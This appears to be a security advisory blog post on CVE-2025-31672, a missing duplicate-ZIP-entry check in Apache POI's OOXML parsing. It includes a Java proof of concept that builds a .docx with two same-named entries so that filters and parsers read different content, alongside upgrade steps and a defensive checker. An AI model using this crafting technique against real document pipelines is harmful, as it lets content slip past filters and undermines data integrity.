CVE-2025-31672 - Improper Input Validation in Apache POI Leaves OOXML Parsing at Risk
Apache POI is one of the most popular open-source libraries for handling Microsoft Office file formats in Java, especially for reading and writing .xlsx, .docx, and .pptx files. Millions of enterprises and projects rely on POI to process business documents. But a recently discovered security flaw, now identified as CVE-2025-31672, highlights a critical weakness in how POI's poi-ooxml component handles certain bad input. This post explains the vulnerability, demonstrates how an attacker could exploit it, and shows how to mitigate the risk.
In Simple Terms
Apache POI before version 5.4.0 did not check for duplicate file names inside Office files (OOXML files such as .xlsx, .docx, and .pptx). These files are ZIP archives containing XML files and resources. An attacker could craft a file that includes two or more ZIP entries (files inside the archive) with exactly the same name and path. This can confuse the program reading the file: depending on the implementation, it might use the first copy or a later one, but not both.
Different software products using POI might disagree on which entry to read, and thus, malicious actors could exploit this to slip through fake or malicious content, leading to further attacks or data leakage.
Fixed: poi-ooxml version 5.4.0
The issue is tracked on the Apache POI security page and the CVE database will soon contain more details.
The Technical Root of the Issue
The ZIP format does not forbid multiple entries with the same path and name. Such archives are abnormal, and java.util.zip.ZipOutputStream refuses to write one (it throws a ZipException for a duplicate entry), but they are easy to produce with other tools or by patching the archive bytes. Readers then disagree on which copy counts: one that scans the archive front to back can stop at the first occurrence, while one that builds a name-to-entry map may end up with the last.
When parsing OOXML files, POI before 5.4.0 used whichever copy its ZIP layer returned and did not check for duplicates, which opened the door to discrepancies between products.
Suppose an attacker prepares an attack.xlsx file containing two entries with the same name:
/xl/sharedStrings.xml
/xl/sharedStrings.xml
- The first /xl/sharedStrings.xml contains benign or even blank data.
- The second /xl/sharedStrings.xml contains malicious XML which could manipulate the runtime or leak sensitive data.
Depending on what Java ZIP library the reader uses, or in cases where software chain-loads the archive with different tools, the actual XML content processed could be either one.
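Here is a simple Java snippet that creates a ZIP file with duplicate entries. Because ZipOutputStream rejects a repeated name, it writes the second entry under a placeholder name of the same length and then patches the raw bytes:
import java.io.ByteArrayOutputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.zip.ZipEntry;
import java.util.zip.ZipOutputStream;

public class DuplicateZipEntry {
    public static void main(String[] args) throws Exception {
        String realName = "word/document.xml";
        // Same length as realName, so renaming does not shift any offsets
        String placeholder = "word/documenX.xml";
        byte[] goodContent = "<xml>Good Data</xml>".getBytes(StandardCharsets.UTF_8);
        byte[] evilContent = "<xml>Malicious Data</xml>".getBytes(StandardCharsets.UTF_8);
        ByteArrayOutputStream buffer = new ByteArrayOutputStream();
        try (ZipOutputStream zos = new ZipOutputStream(buffer)) {
            // First entry: benign content under the real name
            zos.putNextEntry(new ZipEntry(realName));
            zos.write(goodContent);
            zos.closeEntry();
            // Second entry: written under the placeholder, since
            // putNextEntry would throw "duplicate entry" for realName
            zos.putNextEntry(new ZipEntry(placeholder));
            zos.write(evilContent);
            zos.closeEntry();
        }
        // ISO-8859-1 maps bytes to chars one-to-one, so replace() acts as a byte patch.
        // The name is stored in the local header and the central directory;
        // the CRC covers only the entry content, so it stays valid.
        String raw = new String(buffer.toByteArray(), StandardCharsets.ISO_8859_1);
        byte[] patched = raw.replace(placeholder, realName).getBytes(StandardCharsets.ISO_8859_1);
        Files.write(Paths.get("attack.docx"), patched);
        System.out.println("Done: Created attack.docx with duplicate entries.");
    }
}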
You can open attack.docx in MS Word (which may show an error), or load it in a Java/POI-based parser. A parser that does not check for duplicates may process either the first or the second entry.
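The first-versus-last ambiguity can be made concrete with a small sketch. It assumes nothing about POI internals: `DuplicateEntryPolicies` and `readEntry` are hypothetical names, and the code relies only on java.util.zip.ZipInputStream, which walks the entries in archive order and therefore sees every copy. The `lastWins` flag stands in for the two kinds of reader described above.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.zip.ZipEntry;
import java.util.zip.ZipInputStream;

public class DuplicateEntryPolicies {

    /**
     * Hypothetical helper: scans the archive front to back and returns the
     * content of the first or the last entry named entryName, or null if
     * no such entry exists.
     */
    static String readEntry(byte[] zipBytes, String entryName, boolean lastWins) throws IOException {
        String result = null;
        try (ZipInputStream zis = new ZipInputStream(new ByteArrayInputStream(zipBytes))) {
            ZipEntry entry;
            while ((entry = zis.getNextEntry()) != null) {
                if (!entry.getName().equals(entryName)) {
                    continue;
                }
                // Read the full content of the matching entry
                ByteArrayOutputStream content = new ByteArrayOutputStream();
                byte[] chunk = new byte[4096];
                int n;
                while ((n = zis.read(chunk)) != -1) {
                    content.write(chunk, 0, n);
                }
                result = new String(content.toByteArray(), StandardCharsets.UTF_8);
                if (!lastWins) {
                    return result; // a first-wins reader stops at the first match
                }
            }
        }
        return result; // a last-wins reader keeps the final match
    }

    public static void main(String[] args) throws IOException {
        if (args.length != 2) {
            System.err.println("usage: DuplicateEntryPolicies <archive> <entry-name>");
            return;
        }
        byte[] zipBytes = Files.readAllBytes(Paths.get(args[0]));
        System.out.println("first wins: " + readEntry(zipBytes, args[1], false));
        System.out.println("last wins:  " + readEntry(zipBytes, args[1], true));
    }
}
```

Run against an archive with two copies of word/document.xml, the two policies return different content from the same file, which is exactly the disagreement an attacker relies on.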
Exploitation Scenarios
1. Bypass Security Filters: If your application filters out sensitive words by parsing sharedStrings.xml, the attacker can put safe data in the first copy and malicious data in the second, potentially evading detection or poisoning the data supply.
2. Attack Chained Services: If you use different products (some in Java, some on .NET or Python), *they may not read the same version* of the file, causing inconsistent interpretation, data leakage, or integrity errors.
3. Trigger Parsing Errors for Denial-of-Service: In some cases, feeding mismatched files can cause parsers to crash or loop unexpectedly.
Fix: Upgrade to poi-ooxml 5.4.0
Starting with poi-ooxml 5.4.0, POI throws an exception if it finds ZIP entries with duplicate names in the input file. This hardening step closes the loophole.
If you use Apache POI, update your dependencies:
<dependency>
    <groupId>org.apache.poi</groupId>
    <artifactId>poi-ooxml</artifactId>
    <version>5.4.0</version>
</dependency>
Or in Gradle:
implementation 'org.apache.poi:poi-ooxml:5.4.0'
1. Upgrade to poi-ooxml 5.4.0 as soon as possible.
2. Validate all input files. If you process Office documents from untrusted sources, check that your scanning and filtering tools reject files with duplicate ZIP entries.
3. Review any internal tools, integrations, or microservices that might use POI under the hood, even as a transitive dependency.
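For the input-validation step, a pre-check along the following lines could reject suspicious uploads before they reach any parser. This is a minimal sketch using only the JDK, not POI's own check: `DuplicateEntryCheck` and `findDuplicateEntries` are hypothetical names, and the comparison is an exact, case-sensitive match on entry names.

```java
import java.io.IOException;
import java.io.InputStream;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashSet;
import java.util.Set;
import java.util.TreeSet;
import java.util.zip.ZipEntry;
import java.util.zip.ZipInputStream;

public class DuplicateEntryCheck {

    /** Hypothetical helper: returns every entry name that occurs more than once. */
    static Set<String> findDuplicateEntries(InputStream in) throws IOException {
        Set<String> seen = new HashSet<>();
        Set<String> duplicates = new TreeSet<>();
        try (ZipInputStream zis = new ZipInputStream(in)) {
            ZipEntry entry;
            // ZipInputStream walks the entries in archive order,
            // so repeated names are all visited rather than collapsed
            while ((entry = zis.getNextEntry()) != null) {
                if (!seen.add(entry.getName())) {
                    duplicates.add(entry.getName());
                }
            }
        }
        return duplicates;
    }

    public static void main(String[] args) throws IOException {
        if (args.length != 1) {
            System.err.println("usage: DuplicateEntryCheck <office-file>");
            return;
        }
        try (InputStream in = Files.newInputStream(Paths.get(args[0]))) {
            Set<String> duplicates = findDuplicateEntries(in);
            if (duplicates.isEmpty()) {
                System.out.println("No duplicate entry names found.");
            } else {
                System.out.println("Rejecting file, duplicate entries: " + duplicates);
            }
        }
    }
}
```

A check like this complements the upgrade rather than replacing it. It inspects the entries as they appear in the stream, so a tool that reads the archive through its central directory may see the file differently.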
For official guidance, always consult the POI Security Recommendations.
References
- Apache POI Security Page
- CVE-2025-31672 at MITRE *(pending)*
- POI GitHub Repository
- About Office Open XML Format
Conclusion
Improper input validation issues like CVE-2025-31672 are a reminder that file formats—even ones as familiar as DOCX and XLSX—can hide clever tricks attackers use to subvert software. Upgrading your libraries and following good input validation practices are the best defense.
If you use Apache POI, upgrade to poi-ooxml 5.4.0 now. Remain vigilant. File uploads are always risky, but with strong controls, you'll be much safer.
Stay tuned to poi.apache.org/security.html for future updates and best practices!
Timeline
Published on: 04/09/2025 12:15:15 UTC
Last modified on: 04/18/2025 17:15:34 UTC